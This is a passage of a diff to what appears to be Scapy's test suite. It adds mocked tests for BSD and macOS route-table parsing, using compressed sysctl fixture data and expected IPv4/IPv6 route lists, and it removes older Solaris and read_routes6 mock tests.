zlib.decompress(bytes.fromhex('789ced96bb0dc2301086cf38481125a248411131011d3505a2600906406204325a4661040a6a4264f130d6c5b19c87e2f07f458adcd9be2f7fe190984647924414d3a67c1e6252dcf7544f56dfb24cbceac2ac171a7a633a979494e39fce6baffde9e32f94ff8e56eab5e9bfe076c98866ecf6eee7fbf8ebdfa03dffbef2ffcd6f38f977eb9f4eecf5aaf9347fb6311cff8bd77ce3f1bf7acdf7f5bfb18de1f8f3f9fd4bfe8f8a5e67ff9c5f1f8c7f6eaf57cdd79ffffbfe4fd5eb0ef297dcf9aef5a6f77fd5fe7de55f087bdd80f1e7d7b7977fa4fcb7af7bdaf467c7cff899b8f34b7f69abbbe4cfad0f26ffc6ff3ffcfa60f29f0c347f00000000000000000000306a9e0a72ae83')) -from unittest import mock -from io import StringIO - -# Mocked Solaris 11.1 parsing behavior - -@mock.patch("scapy.arch.get_if_addr") -@mock.patch("scapy.arch.unix.SOLARIS", True) -@mock.patch("scapy.arch.unix.os") -def test_solaris_111(mock_os, mock_get_if_addr): - """Test read_routes() on Solaris 11.1""" - # 'netstat -rvn -f inet' output - netstat_output = u""" -IRE Table: IPv4 - Destination Mask Gateway Device MTU Ref Flg Out In/Fwd --------------------- --------------- -------------------- ------ ----- --- --- ----- ------ -default 0.0.0.0 10.0.2.2 net0 1500 2 UG 5 0 -10.0.2.0 255.255.255.0 10.0.2.15 net0 1500 3 U 0 0 -127.0.0.1 255.255.255.255 127.0.0.1 lo0 8232 2 UH 1517 1517 -""" - # Mocked file descriptor - strio = StringIO(netstat_output) - mock_os.popen = mock.MagicMock(return_value=strio) - print(scapy.arch.unix.SOLARIS) - - # Mocked get_if_addr() output - def se_get_if_addr(iface): - """Perform specific side effects""" - import socket - if iface == "net0": - return "10.0.2.15" - return "127.0.0.1" - mock_get_if_addr.side_effect = se_get_if_addr - - # Test the function - from scapy.arch.unix import read_routes - return read_routes() -routes = test_solaris_111() -print(routes) -assert len(routes) == 3 -assert routes[0][:4] == (0, 0, '10.0.2.2', 'net0') -assert routes[1][:4] == (167772672, 4294967040, '0.0.0.0', 'net0') -assert routes[2][:4] == (2130706433, 4294967295, '0.0.0.0', 'lo0') +with BSDLoader(OPENBSD=True, sysctldata=_PFROUTE_DATA, AF_INET6=24) as pfroute: + routes = pfroute.read_routes6() + + +assert routes == [ + ('::', 96, '::1', 'lo0', ['::1'], 1), + ('::1', 128, '::1', 'lo0', ['::1'], 1), + ('::ffff:0.0.0.0', 96, '::1', 'lo0', ['::1'], 1), + ('2002::', 24, '::1', 'lo0', ['::1'], 1), + ('2002:7f00::', 24, '::1', 'lo0', ['::1'], 1), + ('2002:e000::', 20, '::1', 'lo0', ['::1'], 1), + ('2002:ff00::', 24, '::1', 'lo0', ['::1'], 1), + ('fe80::', 10, '::1', 'lo0', ['::1'], 1), + ('fec0::', 10, '::1', 'lo0', ['::1'], 1), + ('fe80:3::1', 128, 'fe80:3::1', 'lo0', ['fe80:3::1'], 1), + ('ff01::', 16, '::1', 'lo0', ['::1'], 1), + ('ff01:3::', 32, 'fe80:3::1', 'lo0', ['fe80:3::1'], 1), + ('ff02::', 16, '::1', 'lo0', ['::1'], 1), + ('ff02:3::', 32, 'fe80:3::1', 'lo0', ['fe80:3::1'], 1) +] += FreeBSD 14.1 amd64 - read_routes() +~ mock_read_routes_bsd little_endian_only + +import zlib + +from scapy.arch.bpf.pfroute import _bsd_iff_flags +_FREEBSD_IFACES = {1: {'name': 'lo0', 'index': 1, 'flags': FlagValue(32841, _bsd_iff_flags), 'mac': '00:00:00:00:00:00', 'ips': [{'af_family': 28, 'index': 1, 'address': '::1', 'scope': 16}, {'af_family': 28, 'index': 1, 'address': 'fe80::1', 'scope': 32}, {'af_family': 2, 'index': 1, 'address': '127.0.0.1'}]}, 2: {'name': 'hn0', 'index': 2, 'flags': FlagValue(34883, _bsd_iff_flags), 'mac': '00:15:5d:00:65:07', 'ips': [{'af_family': 28, 'index': 2, 'address': 'fe80::215:5dff:fe00:6507', 'scope': 32}, {'af_family': 2, 'index': 2, 'address': '172.23.198.182'}]}} + +_PFROUTE_DATA = zlib.decompress(bytes.fromhex('789c136064656162606060e660603067200ceeb012a18808c008a55970c80b3061f2d7881f60c4256f21c4c4c0c6ccc6909167c0201acb90ca4ea43b20e61edb8670182b0bc8125606010663620c7020d2220280118d46072077d623490b0831324820c95b80f8cc0c0c39f90624d98b612e343d3002fd3f10e98109873c34fe117c507ca3c9ffffff01cea77a7ae01898f4c08c431edd9de8e141adf40000e8611aa8')) + + +with BSDLoader(FREEBSD=True, sysctldata=_PFROUTE_DATA, ifaces=_FREEBSD_IFACES, AF_INET6=28) as pfroute: + routes = pfroute.read_routes() + +assert routes == [ + (0, 0, '172.23.192.1', 'hn0', '172.23.198.182', 1), + (2130706433, 4294967295, '0.0.0.0', 'lo0', '127.0.0.1', 1), + (2887237632, 4294963200, '0.0.0.0', 'hn0', '172.23.198.182', 1), + (2887239350, 4294967295, '0.0.0.0', 'lo0', '127.0.0.1', 1), + (3758096384, 4026531840, '0.0.0.0', 'lo0', '127.0.0.1', 250), + (3758096384, 4026531840, '0.0.0.0', 'hn0', '172.23.198.182', 250) +] + += FreeBSD 14.1 amd64 - read_routes6() +~ mock_read_routes_bsd little_endian_only + +_PFROUTE_DATA = zlib.decompress(bytes.fromhex('789ce5553b0e8240109d593e62b72121b1a0e00824165a72042e40696261f40a1ecd837816101236c28461872801e36bb678f3797979bb9ba3e722006c0380030890498aecc0f6f4193e8ec7fb191e295f75d02d3c86083b07e0724b457aa57b93d64f2fd0b0970ccc26ad6781e4a4b0e9d68d1f1d622e7ff29fc95b3f2f6bcddbdafd2cefe33c33f6ede763b87f2e3fb3d64f04bd889f0ec3737e9a3e7a7f691ee9bc4ffd233ad0e858fafd530c6fd3fdedf78fdbd3e44b813c5f4f6fd27a16663f378ecb97f15387aa77d7edf9aaeb1d1fced714a2024e1ba14eaa43454555d6ed46c7d2f97219dea69bfaf7afff41c55c50f9ff3adc3f979f2f44725d78')) + + +with BSDLoader(FREEBSD=True, sysctldata=_PFROUTE_DATA, ifaces=_FREEBSD_IFACES, AF_INET6=28) as pfroute: + routes = pfroute.read_routes6() + +assert routes == [ + ('::', 96, '::1', 'lo0', ['::1'], 1), + ('::1', 128, '::', 'lo0', ['::1'], 1), + ('::ffff:0.0.0.0', 96, '::1', 'lo0', ['::1'], 1), + ('fe80::', 10, '::1', 'lo0', ['::1'], 1), + ('fe80::', 64, '::', 'lo0', ['fe80::1'], 1), + ('fe80::1', 128, '::', 'lo0', ['fe80::1'], 1), + ('fe80::', 64, '::', 'hn0', ['fe80::215:5dff:fe00:6507'], 1), + ('fe80::215:5dff:fe00:6507', 128, '::', 'lo0', ['::1'], 1), + ('ff02::', 16, '::1', 'lo0', ['::1'], 1), + ('ff00::', 8, '::', 'lo0', ['::1', 'fe80::1'], 250), + ('ff00::', 8, '::', 'hn0', ['fe80::215:5dff:fe00:6507'], 250) +] + += NetBSD 10.0 amd64 - read_routes() +~ mock_read_routes_bsd little_endian_only + +import zlib + +from scapy.arch.bpf.pfroute import _bsd_iff_flags +_NETBSD_IFACES = {1: {'name': 'hvn0', 'index': 1, 'flags': FlagValue(34883, _bsd_iff_flags), 'mac': '00:15:5d:00:65:0a', 'ips': [{'af_family': 24, 'index': 1, 'address': 'fe80:1::7184:2b50:9fbe:e337', 'scope': 32}, {'af_family': 2, 'index': 1, 'address': '172.23.207.191'}]}, 2: {'name': 'lo0', 'index': 2, 'flags': FlagValue(32841, _bsd_iff_flags), 'mac': '00:00:00:00:00:00', 'ips': [{'af_family': 2, 'index': 2, 'address': '127.0.0.1'}, {'af_family': 24, 'index': 2, 'address': '::1', 'scope': 16}, {'af_family': 24, 'index': 2, 'address': 'fe80:2::1', 'scope': 32}]}} + +_PFROUTE_DATA = zlib.decompress(bytes.fromhex('789c3bc1c0c2c2c8c0c0c00cc4e60ca8c08a91816640800993bf46fc00868d42428c0c6c2c6c0c196579060ca2b10ca95cc8eacfef87a93b00f407c8486e0e4c7f600311cd94b81ed5ddf5987cb83f58ff0301c85d424c0c12c040cec937c0aa6e07d4fdac0c2c0cc6f4773fdc1de8ee24e4ee0bd0f4c3c88819ee2c2cd471232e7703d30b9c0f4e2758d4b183c2ffff0792d311b1f1402d80ee0e5cfec1161fc8fa6640e383550592a769058cef5d4943e6a3e75f3eb0fb813e108d15fa5c404387e000001e173214')) + + +with BSDLoader(NETBSD=True, sysctldata=_PFROUTE_DATA, ifaces=_NETBSD_IFACES, AF_INET6=24) as pfroute: + routes = pfroute.read_routes() + +assert routes == [ + (0, 0, '172.23.192.1', 'hvn0', '172.23.207.191', 1), + (2130706432, 4294967040, '127.0.0.1', 'lo0', '127.0.0.1', 1), + (2130706433, 4294967295, '0.0.0.0', 'lo0', '127.0.0.1', 1), + (2887237632, 4294967295, '0.0.0.0', 'hvn0', '172.23.207.191', 1), + (2887241663, 4294967295, '0.0.0.0', 'lo0', '172.23.207.191', 1), + (2887237633, 4294967295, '0.0.0.0', 'hvn0', '', 1), + (3758096384, 4026531840, '0.0.0.0', 'hvn0', '172.23.207.191', 250), + (3758096384, 4026531840, '0.0.0.0', 'lo0', '127.0.0.1', 250) +] + += NetBSD 10.0 amd64 - read_routes6() +~ mock_read_routes_bsd little_endian_only + +_PFROUTE_DATA = zlib.decompress(bytes.fromhex('789ced97b14ec3301445af4da8aa964a5544a50e1dd8592a31f01b8c2c1d2b31205017d65682ffe86f30213e8331123fd09109d3368a8127fbd9898c2c87de29ce4dac77749f1d0722cb24807e17b8845bd78f1e0f7968326ee48bea62a40cdadeefe712e323e0f67eea350f12e53f35e3d7e67f43c97f8c0c171e75ff31bfae8b72a49cebd2e1a3e57d5d387c38f837489b5f397cb43a7fa5787fafe0fbda07e2f29f89c133e713e9ba4f52e796bc4ff4bddfffc64e907bc9fa442de22e589fc8c0bd29c7c9712bd6276a4dde9f2bde27d275f72aead772dc847b3710c28f3b947e700b939fe7021dc3fd21f986ed9fcb3ab879b89b6234c3bc679e7ff1747eb57e79d78845cdf37928b9eab271db72b5cd53f5f3ce8c94abf18b65f1750fd07c196ee3fb75ffbb42c95597ef7f97edfdd8eb54897aeb949eb79aae53ddc79edca1f7e52d37dbc74441cf9b51f396ff346f1927ef830efa028ffb7c47')) + + +with BSDLoader(NETBSD=True, sysctldata=_PFROUTE_DATA, ifaces=_NETBSD_IFACES, AF_INET6=24) as pfroute: + routes = pfroute.read_routes6() + +assert routes == [ + ('::', 104, '::1', 'lo0', ['::1'], 1), + ('::', 96, '::1', 'lo0', ['::1'], 1), + ('::1', 128, '::', 'lo0', ['::1'], 1), + ('::127.0.0.0', 104, '::1', 'lo0', ['::1'], 1), + ('::224.0.0.0', 100, '::1', 'lo0', ['::1'], 1), + ('::255.0.0.0', 104, '::1', 'lo0', ['::1'], 1), + ('::ffff:0.0.0.0', 96, '::1', 'lo0', ['::1'], 1), + ('2001:db8::', 32, '::1', 'lo0', ['::1'], 1), + ('2002::', 24, '::1', 'lo0', ['::1'], 1), + ('2002:7f00::', 24, '::1', 'lo0', ['::1'], 1), + ('2002:e000::', 20, '::1', 'lo0', ['::1'], 1), + ('2002:ff00::', 24, '::1', 'lo0', ['::1'], 1), + ('fe80::', 10, '::1', 'lo0', ['::1'], 1), + ('fe80:1::', 64, '::', 'hvn0', ['fe80:1::7184:2b50:9fbe:e337'], 1), + ('fe80:1::7184:2b50:9fbe:e337', + 128, + '::', + 'lo0', + ['fe80:1::7184:2b50:9fbe:e337'], + 1), + ('fe80:2::', 64, 'fe80:2::1', 'lo0', ['fe80:2::1'], 1), + ('fe80:2::1', 128, '::', 'lo0', ['fe80:2::1'], 1), + ('ff01:1::', 32, '::', 'hvn0', ['fe80:1::7184:2b50:9fbe:e337'], 1), + ('ff01:2::', 32, '::1', 'lo0', ['::1'], 1), + ('ff02:1::', 32, '::', 'hvn0', ['fe80:1::7184:2b50:9fbe:e337'], 1), + ('ff02:2::', 32, '::1', 'lo0', ['::1'], 1), + ('ff00::', 8, '::', 'hvn0', ['fe80:1::7184:2b50:9fbe:e337'], 250), + ('ff00::', 8, '::', 'lo0', ['::1', 'fe80:2::1'], 250) +] + += Darwin 23.6 (MacOS 14.5) x86_64 - read_routes() +~ mock_read_routes_bsd little_endian_only + +import zlib + +from scapy.arch.bpf.pfroute import _bsd_iff_flags +_DARWIN_IFACES = {1: {'name': 'lo0', 'index': 1, 'flags': FlagValue(32841, _bsd_iff_flags), 'mac': '00:00:00:00:00:00', 'ips': [{'af_family': 2, 'index': 1, 'address': '127.0.0.1'}, {'af_family': 30, 'index': 1, 'address': '::1', 'scope': 16}, {'af_family': 30, 'index': 1, 'address': 'fe80:1::1', 'scope': 32}]}, 2: {'name': 'gif0', 'index': 2, 'flags': FlagValue(32784, _bsd_iff_flags), 'mac': '00:00:00:00:00:00', 'ips': []}, 3: {'name': 'stf0', 'index': 3, 'flags': FlagValue(0, _bsd_iff_flags), 'mac': '00:00:00:00:00:00', 'ips': []}, 4: {'name': 'XHC2', 'index': 4, 'flags': FlagValue(0, _bsd_iff_flags), 'mac': '00:00:00:00:00:00', 'ips': []}, 5: {'name': 'en0', 'index': 5, 'flags': FlagValue(34915, _bsd_iff_flags), 'mac': '52:54:00:09:49:17', 'ips': [{'af_family': 30, 'index': 5, 'address': 'fe80:5::409:eec9:f06c:50ab', 'scope': 32}, {'af_family': 30, 'index': 5, 'address': 'fec0::89e:daf7:5cb1:f1f0', 'scope': 64}, {'af_family': 30, 'index': 5, 'address': 'fec0::c0c4:1f0b:61ba:ea8', 'scope': 64}, {'af_family': 2, 'index': 5, 'address': '10.0.2.15'}]}, 6: {'name': 'utun0', 'index': 6, 'flags': FlagValue(32849, _bsd_iff_flags), 'mac': '00:00:00:00:00:00', 'ips': [{'af_family': 30, 'index': 6, 'address': 'fe80:6::d36e:82de:94dc:84fc', 'scope': 32}]}, 7: {'name': 'utun1', 'index': 7, 'flags': FlagValue(32849, _bsd_iff_flags), 'mac': '00:00:00:00:00:00', 'ips': [{'af_family': 30, 'index': 7, 'address': 'fe80:7::7ce2:1f7b:2c29:a5ee', 'scope': 32}]}, 8: {'name': 'utun2', 'index': 8, 'flags': FlagValue(32849, _bsd_iff_flags), 'mac': '00:00:00:00:00:00', 'ips': [{'af_family': 30, 'index': 8, 'address': 'fe80:8::e4e0:bef:bf56:2605', 'scope': 32}]}, 9: {'name': 'utun3', 'index': 9, 'flags': FlagValue(32849, _bsd_iff_flags), 'mac': '00:00:00:00:00:00', 'ips': [{'af_family': 30, 'index': 9, 'address': 'fe80:9::ce81:b1c:bd2c:69e', 'scope': 32}]}} + +_PFROUTE_DATA = zlib.decompress(bytes.fromhex('789ccdd94d6813411400e0d9ddcc36e6608d4472a950a8e0d183e8a1a7da5a503008012948b11eaa78f0e6498b180a45c1802d08164f7ab3f4208817b1e84a0ff647ea0fd2832815a5e021018f518931dbce6c5e76df6cb2e36c3a0325bce936fbf5bdd96176669ad00c2584584963e060fd7382e0ed3315fc22a4ed3183718a98260df675f3b8c83c5dc41ceeab7f1acca6ca6366922f451ebf6596598c5d84b8b9f1fd3b01cb8bc58f17a35852e01b337b29b17dd774d5b65a4b97a1dee5c1305772db55f3bba6998b26cc7d6eedf2cc2872ed5ffe5f974df2671abd211eea7a4ce0d9403c59816703e963f7b2508f857b3a5037ef5e72751b34fa581fcf9305fe9ebb4a029785f4b17bd59a5d3661431bb5fbe700b76e2ae780eef2d4619f4f3807c43d1fa5b3e753da587ad7e7b4b11c583aad8d65fe50561bcbc29de7fa589e7c93b5a87ea6d30bcf6eca5a12c082cd77a2269aefd295d280ac45798d2aa541598b052c70edd3ca82ad93986548d612435e8ecb5a605e145986652deaf3f23ba19185c2b83d8b7d8caf61c2c6eedbf7f81a463876ab3d7fa25b62ca4bf5c81b8d2c6b1a59dee96339b9aa8f25b72c6b513ed755732bd12dc1671abe3b71cb9ae099c6deb3b62d97af47b7c455a3196dde03b2fd4e8f4696c72a2cd8781135d178a95bd655586093cfcbab823616e7fb2f590b7c0f505223a72cfd1e10836556d6a2be46e5872a2c2af27234f76053850536d9bc8c54c61fe96219bdf6e9be2e96b1f1a913ba582e5d397bbb5dcbddbac5bd3fdf631536a873d84f1b961bc1d81be6946d69fafb8bcc44492fe1f38cc7680ac24d4dd70a0cade2b035d529f0bdbc56b73ee06b2af7daa7be7abaf72ae6af5a30dec93da17b17266c184739eb1135d9bdf9b9bf8d18db9bb7d97e78a773e46c7e1983f14e3ee7af7fcc27dbb534ea5588e52ce52b88b17ab9cffa4fc4c573441393e02ca520744569cce5ed43ec6667290639b7d5dbe931dd38c18976def40fb15043e2')) + + +with BSDLoader(DARWIN=True, sysctldata=_PFROUTE_DATA, ifaces=_DARWIN_IFACES, AF_INET6=30) as pfroute: + routes = pfroute.read_routes() + +assert routes == [ + (0, 0, '10.0.2.2', 'en0', '10.0.2.15', 1), + (167772672, 4294967295, '0.0.0.0', 'en0', '10.0.2.15', 1), + (167772674, 4294967295, '0.0.0.0', 'en0', '10.0.2.15', 1), + (167772674, 4294967295, '0.0.0.0', 'en0', '10.0.2.15', 1), + (167772675, 4294967295, '0.0.0.0', 'en0', '10.0.2.15', 1), + (167772687, 4294967295, '0.0.0.0', 'en0', '10.0.2.15', 1), + (167772927, 4294967295, '0.0.0.0', 'en0', '10.0.2.15', 1), + (2130706432, 4294967040, '127.0.0.1', 'lo0', '127.0.0.1', 1), + (2130706433, 4294967295, '127.0.0.1', 'lo0', '127.0.0.1', 1), + (2851995648, 4294967295, '0.0.0.0', 'en0', '10.0.2.15', 1), + (3758096384, 4043308800, '0.0.0.0', 'en0', '10.0.2.15', 1), + (3758096635, 4294967295, '0.0.0.0', 'en0', '10.0.2.15', 1), + (4294967295, 4294967295, '0.0.0.0', 'en0', '10.0.2.15', 1) +] + += Darwin 23.6 (MacOS 14.5) x86_64 - read_routes6() +~ mock_read_routes_bsd little_endian_only + +_PFROUTE_DATA = zlib.decompress(bytes.fromhex('789cd5dd5f8c13451800f0d96dbbdb5e8fbbdaebfd114eaf08148fdc830124045f0a1581981062f48c8698c32022313c1925c2c381f8a0a28290887f728644e0d0aa60ce80e60897887fe08120f060cc051030218af74713088a60b73b5bda6e77f73a33fbcd7dfbc27667d2fefaddb7dfcc6cb7a58f84122142488028e9e9b97f8f90cadb60c8a1c1656bbddbbbed6637297e6635e4d01e8c0c1d1b797ed9a7c67e5fceac99e6f9d35d5edf47b3567c5c73683fbd76d3d91d839b6f58667d0ce695fe99f5e2e3ba43fb860b6deb3bda770f59e6f018cc277597463e73b8f878d8a1fdd2f9e8f091ce54c83247c660be1cf0cd1c293e1e71683fb131da7ab843eb31f6f7e7cc4aeedf503049a6b801d2c2cc0a4fdb7e5a3374a2cdb7bc46fd28ef6c9d7f43a7ceacaad69b5416772d56c94c7a784e715ba59ae1562faaf5fec9ed55d6417a39e23b9b1ec6125fea858d2f87770e32ef5c19de1106efd4e06a920e8669894f0620bd2cf14d91ad64f2dbf308894df8f9a9f4f65d38bcab9079d722f36e42e67d1f99770099f72832ef6554ded4d3130999747c70188db70399772632ef1a64deadc8bcfdc8bcc79179cf48f18eb278833db96585d26e8a6a4aae31f8edbdc4e2d5ee25eaac7f546dfd475757e8e159905e96f57c4a5b5438b63a9eb880cbdb08eabdc2ea8d516f22f0072e6f10d4cb9c0f96b729b810973704ea1de6f64eedc2e59d06ea651a8f4bbcb33b7179ef17e455171a5ec5c35bcd56d93bef075cde07047961c68b6ca6a1458c1726bed94ce345315e98f1229b69fe1dd2cb5b1fb299d41a482fef7891cdcc3826c6eb73fe26cdfdd513b5cd62bcfe7dde52ead541bdccf95bf086f7e1f24640bdcce75bc15bb71797b71ed4cb7bbe65338bbe87f4f2c6379b79380de9e53ddf72de51482ff3fc61b2b9ffe633eb6a9079a390deeb2c5efdef652430ed3962ce226a21bd4ce75ba977022e6f12597c93a0f13df5138337a92c21d763f4110922f14e43e64d21f35ab7c0a2f0aae180e5ba0b99f76e245eeb56752cf1b5ee2c9f24c66baee7831ede6ab6626fcd68e1700c85f7aa68af8f9f1f27952bd17385c30b20bdd718bc334862595a0fd36748aa905e96f90ef5d2af582441c70b96f531f5d6522fe8fd041cf1ad93e165591f9779c3905e8ef8d22bc0b0e71b4b3da3de06195e8ef85a5e0dd2cb91bf2dd45b87c43b917ab1d433cb0b9abf2cd7a3cabca0d7cf583e8f2df382e6ef632c5ee560ba462d4c8041f3e1257e2fe87c6711bf17743c6e64f56a9657d929c6ebdfe7b1796fb8105fd0f1ed04c3fa38ef6db29e5201bd7f5280f72f48efbfacf9db34629140c76301de00a49769be53eabd538cd7e7fad06279c9f85fbf957a41f3e11cb357cefc813dbe72e60fccf537791f3d2aaafefa7cbea5909d6fb7bd3aa497793e999233dfb9c9ea9d5fd76d8a60f3418017b49eb5f27b41c70b01f105adbf02bc2164def17fbd2fe76de832eb426e038daf002fb6f8828e6f02bca0d74b047823c8bca0d753057841ef4714e005bd5f4e8017f47e39015ed0ebebcff27beb21bd02e20b7a7f8900ef1d905ea6fb4bd4d45c73964e9f1ed0cbf47961a917b49e317d7ea1a646b46e53bcfce53def427a99ee8729f57e8bccfb1ba497e97e8d9c771bad0b5db1eba0eb0b015ed0f585002fe8fa428017747d21c00bbabe6862f72e34f69b17c37ae3fcde6648af80f80ababf1a2cbe6d90de667e6f1299773232ef3dc8bc539079a7427a1f62f686bb2909f4f7f038bcafcbf03eceed6d7e02d2cb11df2d9484251fb6c9f072e4c376f3119a7cf89a9240e39b64f6d6bf623e8a7f07e97d92dd4bebc383a0df2fe4f06e91e1e5c887f7cc47b0f9c03e5f6fd8489f612912ef6b32bcacd727735e29f3878becde3764787f65f7be23c3cb910fdb917977caf0b2cf771a3e301fc1ce7738ceb70f2909cbf9d623c3cb91bfbb647839f2618f0c2fc7f946bdb0e71b47feeea5242cf9db2bc3cb11df7d32bc1cf3c94fe83380ce27c9695e6f3be8fd041cde2c32ef67c8bc9fcbf0728c6f5f5012687de0882ff5a2c9870332bc1ce3c5979484251ffacc4768f2e12b64de8332bc1cf5ec102561c95fea858def7fccf16da4d74b26fc88c4db23c3cb743fad9aba463e26247b7e45a8bc6d9c7bf5f2b671eead41e6ad45e6ad47e68d61f12a4d86f72d34f940bd75d0de192cdee0d205e6afbc1a9bfe22a497e9f7b90cef1aeb68f055486f1bb7577f81c73b90f31a5f3c5188a24c27a4f02514db667b0763f7e65ed7f6b40e6df9fdd8add2cdad6f2ff5878249650a8c3fbf9f882ba4a58afe87685e28b9401b71561d5e93e7772bcafef6c47486cc2ff8166d2ef1b5e5472f7587826aa311dfe3f43df8e8566fbb35f248272904cbcb599c078e5b9adf59fcba05e7a324b2a4d9bbbf71be197f0feb7cf3290fcaffe4b6b6d36b379ddd31b8f986b1ef920fb6be4071b6bd6e22aed992ceadbf11676332ed15e7957c71d6bdda365c685bdfd1be7bc8d87789b3ad2f509c6daf9b88eb6e71b6f537e26c7c01c52bce276d91aaca19f66abb743e3a7ca43395ff6bbac4d9d61728ceb6d74dc4c36e71b6f537e26c7c11c52bce97035cce8857db898dd1d6c31d5afe5a804b9c6d7d81e26c7bdd443ce216675bffa2719af8569f07ec6d02c7e9427c15fac68bdf8397bbd2fb7570f38ed3c4b73ca0ce70cf2fd7961f181d2971561aa72bf487740e1c6d8baef8a6ae77accee2fefdd6fc5de956acff7045b4f3964b5bd996cfb88895b01efdfa0ae79abb9de75cab64af74ae553257cadf7e6bfe066c769beb38d86dfdfaad3991879d674ee461b7cd1f1cecb67efdd63cc3c3ce33cff0b0dbc66407bbad5fbf35767bd879c66e0fbb6d9c73b0dbfa81d4970aeb49b7ba515b614cacd40fa4be28635b7357324bab2f4a75eb4307bb9cfaa254b7e672b0cba92f4a75eb1807bb9cfaa254b73670b0cba92f2ae2faa222ac2f2ae2faa222ae2f2ae2faa2fa535ffe079dfe8806')) + + +with BSDLoader(DARWIN=True, sysctldata=_PFROUTE_DATA, ifaces=_DARWIN_IFACES, AF_INET6=30) as pfroute: + routes = pfroute.read_routes6() + +assert routes == [ + ('::', 0, 'fe80:5::2', 'en0', ['fe80:5::409:eec9:f06c:50ab'], 1), + ('::', 0, 'fe80:6::', 'utun0', ['fe80:6::d36e:82de:94dc:84fc'], 1), + ('::', 0, 'fe80:7::', 'utun1', ['fe80:7::7ce2:1f7b:2c29:a5ee'], 1), + ('::', 0, 'fe80:8::', 'utun2', ['fe80:8::e4e0:bef:bf56:2605'], 1), + ('::', 0, 'fe80:9::', 'utun3', ['fe80:9::ce81:b1c:bd2c:69e'], 1), + ('::1', 128, '::1', 'lo0', ['::1'], 1), + ('fe80:1::', 64, 'fe80:1::1', 'lo0', ['fe80:1::1'], 1), + ('fe80:1::1', 128, '::', 'lo0', ['fe80:1::1'], 1), + ('fe80:5::', 64, '::', 'en0', ['fe80:5::409:eec9:f06c:50ab'], 1), + ('fe80:5::2', 128, '::', 'en0', ['fe80:5::409:eec9:f06c:50ab'], 1), + ('fe80:5::409:eec9:f06c:50ab', 128, '::', 'lo0', ['fe80:5::409:eec9:f06c:50ab'], 1), + ('fe80:6::', 64, 'fe80:6::d36e:82de:94dc:84fc', 'utun0', ['fe80:6::d36e:82de:94dc:84fc'], 1), + ('fe80:6::d36e:82de:94dc:84fc', 128, '::', 'lo0', ['fe80:6::d36e:82de:94dc:84fc'], 1), + ('fe80:7::', 64, 'fe80:7::7ce2:1f7b:2c29:a5ee', 'utun1', ['fe80:7::7ce2:1f7b:2c29:a5ee'], 1), + ('fe80:7::7ce2:1f7b:2c29:a5ee', 128, '::', 'lo0', ['fe80:7::7ce2:1f7b:2c29:a5ee'], 1), + ('fe80:8::', 64, 'fe80:8::e4e0:bef:bf56:2605', 'utun2', ['fe80:8::e4e0:bef:bf56:2605'], 1), + ('fe80:8::e4e0:bef:bf56:2605', 128, '::', 'lo0', ['fe80:8::e4e0:bef:bf56:2605'], 1), + ('fe80:9::', 64, 'fe80:9::ce81:b1c:bd2c:69e', 'utun3', ['fe80:9::ce81:b1c:bd2c:69e'], 1), + ('fe80:9::ce81:b1c:bd2c:69e', 128, '::', 'lo0', ['fe80:9::ce81:b1c:bd2c:69e'], 1), + ('fec0::', 64, '::', 'en0', ['fe80:5::409:eec9:f06c:50ab'], 1), + ('fec0::2', 128, '::', 'en0', ['fe80:5::409:eec9:f06c:50ab'], 1), + ('fec0::89e:daf7:5cb1:f1f0', 128, '::', 'lo0', ['fec0::89e:daf7:5cb1:f1f0'], 1), + ('fec0::c0c4:1f0b:61ba:ea8', 128, '::', 'lo0', ['fec0::c0c4:1f0b:61ba:ea8'], 1), + ('ff00::', 8, '::1', 'lo0', ['::1'], 1), + ('ff00::', 8, '::', 'en0', ['fe80:5::409:eec9:f06c:50ab'], 1), + ('ff00::', 8, 'fe80:6::d36e:82de:94dc:84fc', 'utun0', ['fe80:6::d36e:82de:94dc:84fc'], 1), + ('ff00::', 8, 'fe80:7::7ce2:1f7b:2c29:a5ee', 'utun1', ['fe80:7::7ce2:1f7b:2c29:a5ee'], 1), + ('ff00::', 8, 'fe80:8::e4e0:bef:bf56:2605', 'utun2', ['fe80:8::e4e0:bef:bf56:2605'], 1), + ('ff00::', 8, 'fe80:9::ce81:b1c:bd2c:69e', 'utun3', ['fe80:9::ce81:b1c:bd2c:69e'], 1), + ('ff01:1::', 32, '::1', 'lo0', ['::1'], 1), + ('ff01:5::', 32, '::', 'en0', ['fe80:5::409:eec9:f06c:50ab'], 1), + ('ff01:6::', 32, 'fe80:6::d36e:82de:94dc:84fc', 'utun0', ['fe80:6::d36e:82de:94dc:84fc'], 1), + ('ff01:7::', 32, 'fe80:7::7ce2:1f7b:2c29:a5ee', 'utun1', ['fe80:7::7ce2:1f7b:2c29:a5ee'], 1), + ('ff01:8::', 32, 'fe80:8::e4e0:bef:bf56:2605', 'utun2', ['fe80:8::e4e0:bef:bf56:2605'], 1), + ('ff01:9::', 32, 'fe80:9::ce81:b1c:bd2c:69e', 'utun3', ['fe80:9::ce81:b1c:bd2c:69e'], 1), + ('ff02:1::', 32, '::1', 'lo0', ['::1'], 1), + ('ff02:5::', 32, '::', 'en0', ['fe80:5::409:eec9:f06c:50ab'], 1), + ('ff02:6::', 32, 'fe80:6::d36e:82de:94dc:84fc', 'utun0', ['fe80:6::d36e:82de:94dc:84fc'], 1), + ('ff02:7::', 32, 'fe80:7::7ce2:1f7b:2c29:a5ee', 'utun1', ['fe80:7::7ce2:1f7b:2c29:a5ee'], 1), + ('ff02:8::', 32, 'fe80:8::e4e0:bef:bf56:2605', 'utun2', ['fe80:8::e4e0:bef:bf56:2605'], 1), + ('ff02:9::', 32, 'fe80:9::ce81:b1c:bd2c:69e', 'utun3', ['fe80:9::ce81:b1c:bd2c:69e'], 1) +] ############ ############ @@ -3305,390 +3323,6 @@ expected = { assert results_dict == expected -############ -############ -+ Mocked read_routes6() calls - -= Preliminary definitions -~ mock_read_routes_bsd - -from unittest import mock -from io import StringIO - -def valid_output_read_routes6(routes): - """"Return True if 'routes' contains correctly formatted entries, False otherwise""" - for destination, plen, next_hop, dev, cset, me in routes: - if not in6_isvalid(destination) or not type(plen) == int: - return False - if not in6_isvalid(next_hop) or not isinstance(dev, str): - return False - for address in cset: - if not in6_isvalid(address): - return False - return True - -def check_mandatory_ipv6_routes(routes6): - """Ensure that mandatory IPv6 routes are present""" - if sum(1 for r in routes6 if r[0] == "::1" and r[4] == ["::1"]) < 1: - return False - if sum(1 for r in routes6 if r[0] == "fe80::" and r[1] == 64) < 1: - return False - if sum(1 for r in routes6 if in6_islladdr(r[0]) and r[1] == 128 and \ - r[4] == ["::1"]) < 1: - return False - return True - - -= Mac OS X 10.9.5 -~ 